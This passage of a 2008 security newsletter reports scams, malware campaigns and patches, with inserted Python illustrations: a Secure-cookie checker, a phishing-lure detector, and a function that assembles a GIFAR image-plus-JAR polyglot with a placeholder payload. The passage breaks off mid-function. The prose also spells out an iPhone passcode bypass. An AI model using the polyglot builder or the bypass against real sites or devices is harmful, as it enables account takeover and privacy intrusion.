OrkutTron performs a variety of malicious actions including an attempt to snaffle login credentials for Orkut, the Google-run
social networking site that's particularly big in Brazil. Fitting in with this theme, the fake Twitter profile is written in
Portuguese.
Attacks targeting Orkut are relatively commonplace, but as Boyd notes, the use of Twitter represents an innovation in such hacking
attacks.
VMware Delivers Fixes for Multiple Flaws
VMware, provider of virtualization solutions, has released updates for 16 vulnerabilities across its product line.
The flaws affect VMware Workstation, Player, ACE, Server and ESX.
Three of the bugs are related to errors in ActiveX controls, Internet Server Application Programming Interface (ISAPI) and
OpenProcess.
The French Security Incident Response Team rated the vulnerabilities "moderate risk." US-CERT encourages users to update
to the latest versions.
Phone Phishers Using Illegal File Sharing Legal Threats
Fraudsters have begun cold-calling householders to accuse them of copyright infringement online and threaten them with court
action, an ISP has reported.
Small ADSL provider UKFSN received a support call yesterday from an elderly customer who was concerned after being contacted by a
scammer on Tuesday.
Accused of illegally sharing music, UKFSN's subscriber was savvy enough to refuse to give any details, and turned the tables on
the caller, demanding to know where they were calling from. When they refused to provide credentials he hung up.
Many observers predicted that fraudsters would seize on lawyers' highly-publicised efforts to extract cash from internet users.
And lo, it has come to pass. Email phishers can't be far behind.
Google Issues First Patches for Chrome
Just days after it rolled out Chrome, Google Inc. issued an update after Vietnamese security researchers reported a critical
vulnerability in the beta browser.
Google patched the vulnerability Sunday and released an updated beta, Version 0.2.149.29, the same day. "We've released an update
to Google Chrome that fixes many of the issues reported here," said someone identified only as "Simon" in a Chrome support forum
yesterday.
Other Chrome vulnerabilities, however, remain unpatched. The blended threat that relies on the months-old "carpet bomb" bug first
reported in Apple Inc.'s Safari -- which, like Chrome, uses the WebKit browser engine -- has not been fixed, for instance.
Already-installed copies of Chrome will update automatically to 0.2.149.29; Google's browser uses a behind-the-scenes update
process that doesn't inform the user that an update is about to be installed. "Google Chrome automatically updates to a newer
version when one is released," the company said in a support document. "The update process happens silently, whether or not you're
using the browser at the time. If Google Chrome is open at the time of the update, you must close the browser and restart for the
new version to launch."
Users can manually update Chrome by selecting the Tools icon at the far right, then choosing "About Google Chrome." An Update
button will appear if a newer version is available.
Microsoft Patch Tuesday - Four Major Updates
Microsoft has confirmed that its Patch Tuesday release on 9 September will include fixes for four 'critical' remote code execution
vulnerabilities.
Affected software includes Microsoft Office, Windows, Internet Explorer, .NET Framework, SQL Server and Visual Studio. Most of the
updates do not require a full restart of the PC.
Microsoft will host a webcast to address customer questions on these bulletins on 10 September.
******************************************************************************************************************
Newsletter Posted 08/29/2008
Most Common E-Mail Scams This Week
We saw a resurgence this week of the "You have received an e-greeting" e-mail scam. The various types of debt relief scams were
also widespread.
These debt related email scams came with a huge variety of subjects, including, "debt relief", "christian debt relief", "south
carolina [and other states] debt consolidation", "debt buster", "debt reduction", "consolidating debt", "get out of credit card
debt", "tenant debt consolidation", "unsecured debt consolidation loan", "debt consolidation loans for people with bad credit",
"help to get out of debt", etc. etc.
We also saw several cases of online pharmacy scams with subject lines similar to: "Never be ripped off by a doctor again", or
"Get all of your pharmacy needs online".
As always, we remind you to remain skeptical and make sure all your friends, and especially those most vulnerable, know
that if it seems too good to be true, it probably is.
BBB Warns Against Credit Union Scam
These next two reports from outside our area are ones that we've seen more and more often. Be aware of these types of scams because they
are very likely to be tried here.
Connecticut Better Business Bureau (CT BBB) has learned of a scam targeting customers of the Commonwealth Credit Union.
CT BBB reports the scam has made its way from Kentucky to Connecticut. Commonwealth CU has been the target of an extensive
“voice-fishing” scam. A recorded message tells clients their credit cards have been suspended, asks them to call a toll-free
telephone number, and once they do, they are asked for their credit card numbers to “reactivate” their accounts. Both
members and non-members of Commonwealth CU have received these calls on their cell, work and home phones. The Kentucky Attorney
General cautions against responding to the message.
Commonwealth Credit Union confirms it never makes calls asking for personal information. On its website, Commonwealth acknowledges
the voice phishing scam, and says thousands of people in Kentucky alone have been targets of these attacks. Among the toll-free
numbers victims are asked to call is one based in Columbia,
West Virginia Warns About Phony Debt Collectors
Consumers in West Virginia who at one time obtained payday loans over the Internet – and even those who never borrowed money at
all – have been getting threatening phone calls from alleged debt collectors.
West Virginia’s attorney general says the debt collectors are actually scam artists. Internet payday loans are short-term loans or
cash advances, usually for 14 days, made over the Internet via interactive web sites and secured by an agreement authorizing
debits of the loan and all fees owed from the consumer’s checking account. These loans typically charge interest rates ranging
from 600-800 APR and are unlawful in West Virginia.
The scam artists, who speak English with a foreign accent, call themselves “U.S. National Bank,” “Federal Investigation Bureau,”
“United Legal Processing” and numerous other phony names. They refuse to disclose real names and addresses and are believed to be
operating “off the grid” from homes, automobiles, or from off shore locations or foreign countries, including India. Since the
scammers have kept themselves purposely well hidden, the official says no law enforcement agencies have succeeded in locating or
shutting them down.
The scammers typically pose as law enforcement officers, investigators, lawyers, and bankers and threaten consumers that they will
be arrested for “bank fraud” or other fictitious crimes unless money is wired immediately. The scammers almost always call
consumers at work several times a day, and tell their supervisors, “Your employee has committed fraud and is about to be
arrested.” Such threats have proven unsettling even to the most savvy consumers and employers who suspect the calls are
fraudulent.
Both of these types of attacks are becoming quite prevalent nationwide, so be aware and avoid becoming a victim.
Hackers Resort To 'Sick' Kidnap Spam
Hackers are claiming they have kidnapped children in a bid to infect PCs with a Trojan Horse virus, says Sophos, an antivirus
vendor and security firm.
The security firm is warning users that emails entitled 'We have hijacked your baby' are being sent to Web users around the globe.
As well as asking for a US$50,000 ransom for the 'release' of the child, the messages also contain an attachment supposed to be a
photograph of the child. Instead the file actually contains a deadly Trojan Horse that will steal personal information.
"Receiving or reading these widespread emails themselves does not mean you are infected, but if users open the attachment they
will be infecting their Windows computer, they will give hackers an open door to take control and steal information," said Graham
Cluley, senior technology consultant for Sophos.
"There's no other way of putting it - this attack is sick. Hackers have no qualms about exploiting a family's natural instinct to
defend its most vulnerable members," added Cluley.
Apple Forgets To Fix iPhone Passcode Bug
An iPhone bug that Apple Inc. patched last January to stop unauthorized users from bypassing the password-protected locking
feature has resurfaced in newer versions of the phone’s software. The bug also affects the iPod touch.
First reported yesterday by a user identified as “greenmymac” on the MacRumors forum, the flaw lets anyone sidestep passcode
locking by simply tapping “Emergency Call” on the password-entry screen, then double-tapping the Home button. That leads to the
iPhone’s Favorites, a list of frequently-called contacts, and their contact information, including phone numbers and addresses.
If any of the contacts have e-mail or Web addresses associated with them, the trick also allows access to the iPhone’s e-mail
application and Safari browser, respectively.
If you use an iPhone or one of the other affected platforms, make sure to stay tuned to Apple for a fix for this,
expected very soon.
Ubuntu Issues Warning, Urges Users To Upgrade
If you are an Ubuntu user, you may want to take note that the company has issued a warning to all its users to make sure they are
using the latest version of the distro.
Due to a security flaw, the vendor has warned that all versions from Ubuntu 6.06 onwards to 8.04 are vulnerable to a local
security exploit that could result in system compromise once the attacker gains access to root.
The flaw is not a remote vulnerability. The attacker would have to have an account on the system in question in order to attempt
the exploit, the result of which could range from crashing the system to compromising its data. The issue affects multiple
editions of Ubuntu, including Kubuntu, Edubuntu and Xubuntu.
Canonical sent the warning email earlier this week. If you are using an older version of Ubuntu, now is a good time to
update.
E-Mail Scam Targeting Law Firms Ensnares a Lawyer in Atlanta
I just include this to emphasize the fact that anyone can become a target in this battle, and just because you went to a lot
of college doesn't mean you can't be fooled.
A lawyer in Atlanta who often handles legal transactions with Asian clients and often via email, was understandably fooled by an
email from Taiwan asking him to help collect a debt in the United States.
The "debtor company" sent him a cashier's check for nearly $200,000 and he deposited it in his trust account before wiring the
money to a South Korean bank. The check, of course, was counterfeit.
The attorney waited three days after the check was deposited before wiring the money, as his bank had told him that was enough
time to ensure the check had cleared. However, the scammers had changed the nine-digit routing number at the bottom of the check
so that it was routed to a different bank than the one named, resulting in a delay in processing. The lawyer's bank is now suing
him for the money, claiming that it extended him provisional credit when it wired the money to South Korea.
The scammer identified itself as Tah Tong Textile Co., a real company that trades on the Taiwanese stock exchange. However, the
attorney now says he's pretty sure there is no connection between that company and the scammers who contacted him.
There are reports of at least seven more attorneys who have fallen prey to similar email scams across the country.
BitRoll and Torrent101 Used to Distribute the Lop Adware
Panda Security today announced that PandaLabs, Panda Security's laboratory for detecting and analyzing malware, has discovered
two spoof P2P application installers, BitRoll-5.0.0.0 and Torrent101-4.5.0.0 that are being used to install the Lop adware on
users' systems. These programs are used to exchange files between remote users and both these installers are available for
download on the Internet, so any user could access them and become infected.
The Lop adware is designed to display ads from various advertisers through pop-up windows, banners, etc. It also switches the
Internet Explorer home page to its own search engine. When searches are made with this engine, the results returned will be
advertising pages related to the search words.
Other false applications are also being used by cyber-crooks to install malicious code, such as a program called
wavesoftwarecreative.exe (which passes itself off as audio software) or another called bitdownloadsetup.exe.
To help prevent detection, this adware connects periodically to a Web page from which it downloads new files containing variants
of the code, making it difficult to delete all active malicious files on the system. If users try to use the program installed,
they will be able to search for files but not download them.
"Very often, users unwittingly 'consent' to installing adware through clauses in the license agreements of other programs,"
explains Luis Corrons, technical director of PandaLabs. "In this case however, there is no mention in the agreement about the
installation of Lop."
The Case of the 12,000 Lost Laptops
Business travelers are losing more than 12,000 laptops per week at U.S. airports. Only one-third of those are reclaimed,
according to a study by the Ponemon Institute, sponsored by Dell.
At the same time, more than 53 percent of polled business travelers say their laptops contain confidential or sensitive
information, and 65 percent of these travelers admit they do not take steps to protect or secure the information contained on
their laptop.
Companies are dependent on a mobile workforce with access to information no matter where they travel. This mobility, however, is
putting companies at risk of having a data breach if a laptop containing sensitive information is lost or stolen.
To gather more information about this concern, the Ponemon Institute conducted field research at 106 major airports in 46 states
and surveyed 864 business travelers in an airport environment. The airports with the highest number of lost, missing or stolen
laptops include: Los Angeles International, Miami International, Kennedy International and Chicago O’Hare. While Atlanta’s
Hartsfield-Jackson International is the busiest airport in the United States, it is tied for eighth place (with Washington’s
Reagan National) for lost, stolen or missing laptop computers.
According to the study, the types of company information contained on business travelers’ laptop computers include customer or
consumer data (47 percent), business confidential information (46 percent), intellectual property such as software code,
drawings or renderings (14 percent), and employee records (13 percent). The average business cost when confidential personal
information is lost or stolen is $197 per record, says the Ponemon Institute. Even one missing laptop, however, can become a
serious problem for any organization.
New Online Encyclopedia of Internal Network Threats
Promisec has released an online encyclopedia of internal network security threats. The encyclopedia, which can be viewed by
anyone for free, is continually updated with detailed explanations of the latest internal threats. The site contains monthly
charts showing how internal network risk trends have changed in the past year, an internal security tips and tricks section,
articles on recent internal security incidents, an overview of internal threats, and a wide array of other resources.
Check it out at promisec dot com slash encyclopedia.
******************************************************************************************************************
Newsletter Posted 08/21/2008
CNN Scam Morphs to MSNBC, Weekly News, etc. - Now Debt Consolidation
Hackers trying to plant malware on PCs switched from touting news supposedly from CNN in come-on messages to pushing breaking
stories said to be from rival network MSNBC, and most recently simply titling them, "Weekly News Release".
The fake messages pose with subject headings that include the phrase “Breaking News,” along with phony headlines, such as “Jerry
Yang relinquishes control over Yahoo,” “Mary-Kate Olsen responsible for Heath Ledger’s death” and “Plane crashes into prep school,
hundreds of kids killed.”
At its peak, the blitz dumped nearly 11 million messages an hour on users. But as of today it seems this particular attack has come
to an abrupt halt, and now the latest blast of phishing schemes are all debt-related come-ons.
The scammers will just keep evolving their tactics, so your job is to remain skeptical and remind all your friends and
relations that if it seems too good to be true, it probably is.
New Phishing Scam Targets Apple MobileMe Users
There have been new reports of a phishing attack circulating via email messages that appear to be targeting Apple MobileMe users.
These messages claim that there is a problem with the user's billing information and instruct the user to follow a web link to
update personal information. Clicking on this link directs the user to a web page that contains a seemingly legitimate web form
requesting personal and financial information. Any information entered in this form is not sent to Apple but rather, to a malicious
attacker.
If you use Apple's MobileMe, be aware of this attack and delete any messages that look suspicious.
Hackers Leverage Olympics In New Attacks
As we expected and warned about last time, Internet and computer security firms report that the Summer Olympics have presented
cyber criminals with an opportunity to leverage public interest in the games to launch new attacks.
Olympic themed junk emails spiked before the games’ opening ceremony, with hackers sending malicious messages aiming to trick
unsuspecting recipients into opening booby-trapped attachments or to visit phony Web sites. Some of the messages were disguised as
fake award notifications, telling users that they had won an Olympic lottery and needed to respond to claim their prize.
SPAM E-Mail Uses Russia/Georgia Conflict
There are public reports of malware circulating via spam email messages related to the Russia/Georgia conflict. These messages
contain factual information about the conflict. The messages also contain download instructions for the user to watch a video
that is attached to the message. If a user opens the attachment, malware may be downloaded and installed onto their system.
Clipboards Hijacked in Web Attack
Whenever you copy and paste or cut and paste text or files, your operating system saves that information to your "clipboard". We have learned
of a new attack that hijacks the clipboard and puts a hard-to-delete web link into the clipboard that, if followed, leads to a
website selling fake security software.
Researchers have found that some big websites, including Digg, MSNBC, and Newsweek, are being salted with these malware-infected Adobe
Flash banner ads. Any web browser on Windows, Mac, and Linux systems that runs Flash, which is almost all of them including
Microsoft’s Internet Explorer, Apple’s Safari, and Mozilla’s Firefox, is said to be vulnerable.
The malicious advertisements place a persistent URL on the user’s clipboard, which points to a fake anti-virus program that
presumably contains malware like a Trojan, keyboard logger, zombie robot, or rootkit. The user has to close and restart the web
browser or even reboot the system in order to purge the offending URL and make their clipboard usable again. It is apparently not
known yet how the offending banner ads are being inserted or served.
More Security Holes Plague MySpace, Possibly Facebook
MySpace was working to fix a security hole on Monday that allows people to see private comments friends
have written on members' pages.
"MySpace is committed to keeping all users as safe and secure as possible. Today, MySpace was alerted to an issue within the MySpace
Mobile WAP site and is working to roll out an immediate fix," a MySpace spokesperson wrote in an e-mail.
With the MySpace hole, people have to go through the company's mobile page and know the user ID of a member to read their private
comments, said Canadian computer technician Byron Ng, who alerted CNET News to the issue and said he had previously contacted
MySpace as well.
Getting someone's user ID is easy; just hover over the name and the user ID is the first group of numbers buried in the coding at
the bottom of the page.
In addition, security vulnerabilities publicized by Ng in June that allow MySpace users to delete bulletins from groups they don't
control, to pin and unpin topics in groups they aren't members of, and to post messages to a group they are banned from remained
unfixed. Those issues are expected to be fixed within the week, MySpace said.
Meanwhile, Facebook was investigating possible security issues of its own, including a third-party app that lets people see comments
written on member pages, even if they aren't their friends.
"We're still checking on Advanced Wall but we've confirmed that there is not a hole in Free Gifts," a Facebook spokesman wrote in
an e-mail. "It's only public gifts that can be seen in the manner you propose below, which is how they are meant to be seen....
Private gifts are not shown on this page."
Facebook users should remember that photos and videos are public unless the person who posts them sets the privacy setting
to private. MySpace users should make sure to keep their versions up to date and ensure their settings are correct to ensure privacy.
Facebook Blocks Links Between Its Site and Malware Infested Web Sites
"We've identified and blocked the ability to link to the malicious Web sites from anywhere on Facebook. Less than .002% of people
on Facebook have been affected, all of whom we notified and suggested steps to remove the malware," wrote Max Kelly, Facebook's
head of security, in a blog post early Friday.
Security company Sophos PLC had recently issued a warning about the attack, in which malicious hackers were targeting unsuspecting
Facebook users via postings on the site's Wall feature.
The Wall, a core component of Facebook profile pages, is used by members to leave one another messages. Impersonating members'
friends, malicious hackers posted messages urging users to click on a link to view a video on a Web site they falsely said was
hosted by Google.
However, the link took users to a rogue Web page where they were told to download a new version of Adobe Systems Inc.'s Flash
player in order to view the video. If users authorized the download, the site would install a Trojan horse, Troj/Dloadr-BPL, that
funneled other malicious code detected as Troj/Agent-HJX into their PCs.
Then, an image of a court jester sticking his tongue out would appear. Facebook members might think it was an innocent practical
joke by a friend, but in fact, at that point, their PCs would have been seriously compromised and put in the control of malicious
hackers so they could be used to disseminate spam and malware and perform other harmful actions, according to Sophos.
UTorrent Peer to Peer Client Fixes Vulnerability
One of the most popular programs used by some to illegally share files under copyright has patched a serious software vulnerability.
The problem affects the P-to-P (peer-to-peer) program uTorrent as well as BitTorrent Mainline, another program based on the
uTorrent code. It has been classified as “highly critical,” the second most severe ranking of risk, by Secunia, a security vendor
in Denmark. Both programs use the BitTorrent protocol, which has become the most popular method of file sharing worldwide,
according to iPoque, a company based in Leipzig, Germany, that specializes in traffic-management appliances for ISPs.
The programs collect pieces of a particular file from other computers around the world and assemble it. The vulnerability can be
exploited if a user downloads a malicious torrent, which is a text file that coordinates the downloading of content. The problem
causes a stack overflow, which can allow an attacker to upload other malicious software to a PC. The bug was in the software for
at least two years, wrote the researcher who is credited with the find.
If you use UTorrent or BitTorrent for Peer to Peer file sharing (or any other P2P software), be aware that these can be extremely dangerous (you can
never know for sure the files you are downloading aren't infected - nearly 70% have at times been shown to be malware). If you
choose to use these services, be sure your antivirus is running and up to date, and be sure to use the P2P software's
most recent clients.
Microsoft Issues Massive Security Update for Windows, Office
In its largest batch of security fixes in 18 months, Microsoft Corp. last week released 11 software updates to plug 26 holes in
Windows, Office, Internet Explorer, and other products. Six of the updates were tagged “critical,” Microsoft’s highest severity
rating.
The company acknowledged that at least two of the vulnerabilities being patched have already been exploited by attackers in the wild.
Those two, plus another pair, said one security researcher, should be considered "zero-day" bugs because technical details about the
flaws had been circulating prior to today.
This month’s update count was supposed to be even larger: Microsoft said it decided not to issue an expected fix for Windows Media
Player 11 “because of a last-minute quality issue.”
If you are using Microsoft Operating Systems or Office software, be sure that you have applied this update. We recommend
using AutoUpdate and enabling it to automatically install any new updates from Microsoft.
Opera v9.52 Available As Security Upgrade
Opera has released a recommended security and stability upgrade. It fixes the following issues:
- Fixed a startup crash that could allow execution of arbitrary code
- Sites can no longer change framed content on other sites
- Fixed an issue that could allow cross-site scripting
- Custom shortcuts no longer pass the wrong parameters to applications
- Prevented insecure pages from showing incorrect security information
- Feed links can no longer link to local files
- Feed subscription can no longer cause the wrong page address to be displayed
Researcher Reveals Critical Java Bugs in Nokia Phones
A pair of critical vulnerabilities in Sun Microsystems Inc.'s Java technology for mobile devices could be used by hackers to
surreptitiously make calls, record conversations and access information on Nokia Series 40 cell phones, a Polish researcher
reports.
Adam Gowdiak, a researcher who has found numerous bugs in Java 2 Micro Edition (J2ME) in the past, said he reported the two
vulnerabilities to Sun last Thursday and notified Nokia the same day of the security issues in its handsets.
Bank Warns of Cell Phone Scam
We are hearing reports of these types of scams all across the country. This week, the chief executive officer of Mutual Bank
urged the public to beware of a cell phone/identity theft scam, and to immediately contact authorities if they receive such a
message.
A number of cell phone owners in the region received text messages from a source claiming to be Mutual Bank, saying that the
customer’s bank account access had been locked, and urging recipients to call 508-424-1203 to restore the account. According to
the official, a recorded message then asks for the customer’s card and pin number.
He said the scam is apparently the work of scam artists who picked the name of the bank and sent text messages to a random list of
cell phone owners, in the hope that at least some of the people on their list were actually Mutual Bank customers. The cell phone
numbers did not come from Mutual Bank, he said.
These types of attacks are becoming commonplace. Please be aware of them and inform your vulnerable friends and family.
GMail Tip - Use HTTPS To Ensure Security
Some Gmail users already know that to ensure your gmail session can't be picked up in public wi-fi areas, you need to login via
https://mail.google.com. Doing so puts your mail session into 128-bit encryption, so that, as Ryan Singel of 'Threat Level' puts
it, "[it leaves] would-be Wi-Fi snoops at a cafe staring at the electronic equivalent of a blended latte."
Basically, anytime you are using a public wi-fi system, you should always login to your web based email accounts using https if it
is available. Otherwise your email session is easily readable by anyone with a wi-fi monitoring application.
But there's another type of attack that can allow the attacker to grab a cookie over the wi-fi airwaves and login to your account
temporarily, even though they don't know your password. This attack is about to get very easy with the release of a new hacking
tool.
Simply logging in to https won't save you from this one. Instead you need to make your Gmail (or other web based email accounts)
always run using a secure protocol such as SSL.
If you are a Gmail user, login, go to settings and then look for Browser connection. Select always use https:// unless you
have a desktop and a dial-up connection. If you use other web-based email, look for a similar setting and enable it.
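The reason a secure login alone does not protect the session, as an added illustration that is not part of the newsletter: a browser sends a cookie on every request to the site unless the cookie carries the Secure attribute, so a session cookie issued without it can travel over a plain http:// request even though the login itself was encrypted. Forcing the whole session onto HTTPS removes those cleartext requests. The Set-Cookie headers below are constructed samples, not captures from Gmail or any real site.

```python
"""Why 'log in over HTTPS' is not enough: a cookie set without the Secure
attribute is sent by the browser on any plain http:// request to that host,
where a passive Wi-Fi observer can read it.  Added illustration, not part of
the newsletter; the Set-Cookie headers below are constructed samples."""

from typing import List, NamedTuple


class Cookie(NamedTuple):
    name: str
    value: str
    secure: bool      # transmitted only over TLS
    httponly: bool    # not readable by page scripts


def parse_set_cookie(header: str) -> Cookie:
    """Parse one Set-Cookie header value into a Cookie record."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    # Attribute names are case-insensitive; flags like Secure carry no value.
    attrs = {p.split("=", 1)[0].strip().lower() for p in parts[1:] if p}
    return Cookie(name.strip(), value.strip(), "secure" in attrs, "httponly" in attrs)


def sent_on_request(cookie: Cookie, scheme: str) -> bool:
    """Mirror the browser rule: Secure cookies travel only over https."""
    return scheme == "https" or not cookie.secure


def cookies_exposed_on_http(headers: List[str]) -> List[str]:
    """Names of cookies that a plain http:// request to the site would carry in the clear."""
    return [c.name for c in map(parse_set_cookie, headers) if sent_on_request(c, "http")]


# Constructed samples.  Both sites authenticate over HTTPS; only the second
# marks its cookies Secure, so only the second keeps them off cleartext links.
LOGIN_ONLY_HTTPS = ["SID=s3ss10n; Path=/; HttpOnly", "PREF=lang=en; Path=/"]
ALWAYS_HTTPS = ["SID=s3ss10n; Path=/; Secure; HttpOnly", "PREF=lang=en; Path=/; Secure"]

if __name__ == "__main__":
    for label, hdrs in (("login-only HTTPS", LOGIN_ONLY_HTTPS), ("always HTTPS", ALWAYS_HTTPS)):
        print(f"{label}: exposed over http:// -> {cookies_exposed_on_http(hdrs) or 'none'}")
```

The same check is useful on any web mail or intranet application: inspect the Set-Cookie headers the login response returns, and treat every session cookie that lacks Secure as one that a shared Wi-Fi network can expose.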
******************************************************************************************************************
Newsletter Posted 08/06/2008
CNN Top Ten Scam
We have seen a large influx of a new SPAM email this week with three different CNN subject lines. We have 'CNN Top 10 XP
Antivirus' and 'CNN.com Daily Top 10' the other day and today, we have 'CNN Alerts: My Custom Alert'.
We've also had reports of increasing use of the upcoming Olympics by scammers to try to entice people to click on links, or open
files in emails.
With the CNN attack, users were directed to a website with a blank video that used an enticing news item as its title. If you
clicked on the video it would prompt you to download a program to run the video. This was, of course, a malware program that in
most cases just trashed computers, but in some, took them over as part of a botnet.
We can expect to see many more of these types of attacks as they pique curiosity and seem to work very well. The Olympics or any
other internationally known event is a perfect ruse.
Expect these type of scams and avoid them by simply deleting any emails that promise a news story.
Storm Trojan Using FBI vs. FaceBook
A new spam that is yet another push of the Storm trojan is showing up with titles like "FBI may strike Facebook" or "FBI watching
us". The purveyors of the Storm malware are relentless and have not missed a trick to keep trying to get their malicious software
out there. In July alone we saw an Independence Day attack and more recently a campaign playing on people's fears about the
worldwide financial situation.
The Storm malware is one of the largest bot creators ever built. It is responsible for recruiting many hundreds of thousands of
unknowing users' computers into remote controlled "botnets". These are used to spread more spam, extort web sites and critical
infrastructure, and create denial of service attacks.
Be aware of these types of attacks and just delete!
Airline E-Ticket Scam
Public reports indicate that a new email attack is circulating that uses email messages that appear to be from legitimate
airlines and contain information about a bogus e-ticket. These email messages instruct the user to open the attachment to obtain
the e-ticket. If a user opens this attachment, a file may be executed to infect the user's system with malicious code. Reports,
including a posting by Sophos, indicate that these messages have the following characteristics (please note that these attributes
may change at any time):
- The subject line "E-Ticket#XXXXXXXXXX"
- An attachment named "eTicket#XXXX.zip"
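A mail-gateway style check for the two indicators just listed, as an added illustration that is not the newsletter's or Sophos's detection logic. Because the report notes the attributes may change, the patterns are case-insensitive, tolerant of spacing and digit count, and backed by a broader rule for any archive attachment posing as a ticket. The message records are constructed samples.

```python
"""Flag messages matching the bogus e-ticket campaign's indicators.
Added illustration, not part of the newsletter; the messages below are
constructed samples, not real mail."""

import re
from typing import Dict, List

# Patterns derived from the two reported indicators: subject "E-Ticket#XXXXXXXXXX"
# and attachment "eTicket#XXXX.zip".  Kept loose because the lure may change.
SUBJECT_RE = re.compile(r"^\s*e-?ticket\s*#\s*\d{4,}", re.IGNORECASE)
ATTACHMENT_RE = re.compile(r"^e-?ticket\s*#\s*\d+\.zip$", re.IGNORECASE)
ARCHIVE_EXT = (".zip", ".rar")


def score_message(msg: Dict) -> List[str]:
    """Return the indicators that matched for one message (empty list = clean)."""
    hits: List[str] = []
    if SUBJECT_RE.search(msg.get("subject", "")):
        hits.append("subject matches E-Ticket# lure")
    for name in msg.get("attachments", []):
        if ATTACHMENT_RE.match(name):
            hits.append(f"attachment '{name}' matches eTicket#.zip lure")
        elif "ticket" in name.lower() and name.lower().endswith(ARCHIVE_EXT):
            # Broader rule: a genuine ticket arrives as a document, not an archive.
            hits.append(f"archive attachment '{name}' posing as a ticket")
    return hits


def flag_messages(messages: List[Dict]) -> Dict[str, List[str]]:
    """Map message id -> matched indicators for every message that matched."""
    flagged: Dict[str, List[str]] = {}
    for msg in messages:
        hits = score_message(msg)
        if hits:
            flagged[msg["id"]] = hits
    return flagged


# Constructed sample messages (sender domains use the reserved .invalid TLD).
CONSTRUCTED_MESSAGES = [
    {"id": "m1", "from": "noreply@example-air.invalid",
     "subject": "E-Ticket#4573920118", "attachments": ["eTicket#4573.zip"]},
    {"id": "m2", "from": "friend@example.invalid",
     "subject": "Your itinerary", "attachments": ["itinerary.pdf"]},
    {"id": "m3", "from": "billing@example-air.invalid",
     "subject": "eTicket #99120044 confirmation", "attachments": ["Ticket_Confirmation.zip"]},
]

if __name__ == "__main__":
    for msg_id, hits in flag_messages(CONSTRUCTED_MESSAGES).items():
        print(msg_id, "->", "; ".join(hits))
```

Flagged messages are candidates for quarantine and review rather than automatic deletion, since the broader archive rule can also catch a legitimate sender who zipped a document.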
Yahoo Sold to Microsoft - More Fake Headline Spam
Security vendor Marshal is warning that a growing large-scale botnet – called Rustock - is forwarding spam containing exploitive
headlines in an attempt to infect users and grow its network.
Numerous small businesses and private web sites, so far predominantly in U.S. and China, have been targeted in the campaign,
claimed Marshal. The security vendor warned a variety of headlines are being used to lure victims into clicking on a malicious
link. They include: “Yahoo sold to Microsoft, record price;” “Bush Down to 8 Friends on Myspace;” “Al Qaeda Reports Declining
Revenues in Fiscal ‘08.”
The spammers appear to be experimenting to see which types of headlines solicit the most hits from recipients. Marshal’s records
revealed that Rustock is estimated to comprise over 150,000 infected PCs and distributes close to 30 billion spam messages daily
which in terms of volume makes it one of the biggest malicious spam campaigns ever seen.
Music Files Used to Spread Malware
A new kind of malicious software could pose a danger to Microsoft Windows users that download music files on peer to peer networks.
The new malware inserts links to dangerous Web pages within ASF (Advanced Systems Format) media files. If a user plays an infected
music file, it will launch Internet Explorer and load a malicious Web page which asks the user to download a codec. Users on a
digital audio enthusiast site differed over the danger level of the malware.
Twitter Exploits
In the last couple of weeks we have seen reports of Twitter vulnerabilities and now exploits are being seen in the wild. A
Twitter profile has started sending links with lures to a pornographic video of Brazilian pop star Kelly Key. This profile has
been especially created to infect users. If a user clicks on the video link they see a window that shows the progress of an
automatic download of a so-called new version of Adobe Flash, supposedly required to view the video. You end up with a file
falsely labeled 'Adobe Flash' on your computer (this is a very popular new technique with scammers). This file is in reality a
Trojan downloader that proceeds to download malware disguised as MP3 files.
Twitter also has a known auto-follow vulnerability that, though partially patched, can still be exploited from Internet
Explorer. It lets an attacker tamper with your account so that you automatically "follow" the attacker's account. Anything
the attacker then posts on that page, including links to malware, is delivered straight to you.
If you are a user of Twitter, watch for these types of scams and be sure to patch with the latest versions as soon as they
are available.
Facebook and MySpace Being Used to Spread Malware
Facebook and MySpace are being exploited to spread a worm disguised as a Flash Player update. The worm sends a variety of
comments and messages to the friends of anyone infected. The comments use the names of celebrities such as Paris Hilton and topics
such as hacking and secret cameras to convince potential victims to click a link.
If you click the link you are redirected to a Web site which announces you need to download an update to your Flash player.
(NOTE: Does anyone else notice a pervading theme to this week's newsletter?)
These types of attacks are particularly difficult to counter because they exploit the trust you have in your social network. A
message or comment left by one of your "friends" is much more likely to be acted on, and these attacks have in fact proven
extremely lucrative for the bad guys.
If you are a member of a social networking site, remember the lessons of email. Don't click on any links that you can't
be sure are legitimate. If you're not sure - use that old fashioned telephone thing to call your friend and see if they actually
sent you the link.
A Photo That Can Steal Your Facebook Account
And while we're talking about Facebook...
At the Black Hat computer security conference in Las Vegas next week researchers will demonstrate software they have developed
that could steal online credentials from users of popular Web sites such as Facebook, eBay, and Google.
The attack relies on a new type of hybrid file that looks like different things to different programs. By placing these files on
Web sites that allow users to upload their own images, the researchers can circumvent security systems and take over the accounts
of Web surfers who use these sites.
They call this type of file a graphics interchange format java archive (GIFAR). At Black Hat, the researchers will show attendees
how to create the GIFAR while omitting a few key details to prevent it from being used immediately in any widespread attack. The
attack could work on any site that allows users to upload files, potentially even sites used to upload photos of bank
cards, or Amazon.com. Because it is the Java plug-in, not the browser, that opens the archive half of a GIFAR, the attack works
in many browsers. However, the victim would have to be logged into the Web site that is hosting the image for the attack to work.
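To make the hybrid-file idea concrete, here is an added Python example written for this newsletter; it is not code from the page or from the Black Hat researchers. It assumes the GIFAR layout as publicly described, a GIF image with a ZIP/JAR archive appended: GIF decoders read from the front of the file, while ZIP readers (the Java runtime's included) locate the central directory from the end, so each side sees a well-formed file of its own type. The 1x1 GIF, the member name payload.class and its contents are constructed placeholders, and the accept_upload check is our suggested hardening, not anything the researchers published.

```python
import io
import zipfile

# Constructed 26-byte GIF89a (1x1 pixel, no colour table). Enough to satisfy
# a magic-number style image check; it is a placeholder, not from the page.
TINY_GIF = (
    b"GIF89a"                                    # signature + version
    b"\x01\x00\x01\x00\x00\x00\x00"              # logical screen descriptor: 1x1
    b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00"  # image descriptor: 1x1 at (0,0)
    b"\x02\x02\x44\x01\x00"                      # LZW min code size + one data sub-block
    b"\x3b"                                      # trailer
)


def make_gifar(gif: bytes, member_name: str, member_bytes: bytes) -> bytes:
    """Assumed GIFAR layout: the GIF first, then a ZIP/JAR archive appended."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr(member_name, member_bytes)
    return gif + buf.getvalue()


def passes_naive_image_check(data: bytes) -> bool:
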